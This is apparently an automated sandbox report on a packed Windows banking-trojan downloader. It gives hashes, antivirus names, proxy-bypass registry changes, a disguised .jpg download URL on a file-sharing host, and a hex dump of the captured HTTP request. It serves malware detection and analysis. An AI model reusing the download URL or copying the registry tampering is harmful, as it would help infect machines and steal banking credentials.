Analysis Date: 2014-04-22 06:12:59
MD5: ebfed9291bc5245b72cd0a4b04afed25
SHA1: aa941b416a496453a3631268f9602a74c206b69b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .nsp0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .nsp1 md5: 20d9279d156b6c3f726de74cb5c19ff6 sha1: 4742f0856080c4229db1b302b60e99fd3081b724 size: 44753
Section: .nsp2 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp: 1992-06-19 22:22:17
Packer: NsPack 3.4 -> North Star
PEhash: 785198a2c2cc77c3028cbe4a07aef7f80a797e57
IMPhash: c575de919e22c1b4f97db83abfbc5fab
AV avg: PSW.Banker4.XWL
AV avira: TR/Dldr.Delphi.Gen
AV mcafee: PWS-Banker.dldr

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: www.box.net
Winsock URL: http://www.box.net/shared/static/i6h0vpmuco.jpg

Network Details:

DNS: www.box.net, Type: A, 74.112.184.83
DNS: www.box.net, Type: A, 74.112.185.83
HTTP GET: http://www.box.net/shared/static/i6h0vpmuco.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1033 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1034 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1035 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1036 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1037 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1038 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1039 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1040 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1041 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1042 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1043 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1044 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1045 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1046 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1047 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1048 ➝ 74.112.184.83:80
Flows TCP: 192.168.1.1:1049 ➝ 74.112.184.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f736861 7265642f 73746174   GET /shared/stat
0x00000010 (00016)   69632f69 36683076 706d7563 6f2e6a70   ic/i6h0vpmuco.jp
0x00000020 (00032)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000030 (00048)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000040 (00064)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000050 (00080)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000060 (00096)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000070 (00112)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000080 (00128)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000090 (00144)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000a0 (00160)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000b0 (00176)   0d0a486f 73743a20 7777772e 626f782e   ..Host: www.box.
0x000000c0 (00192)   6e65740d 0a436f6e 6e656374 696f6e3a   net..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings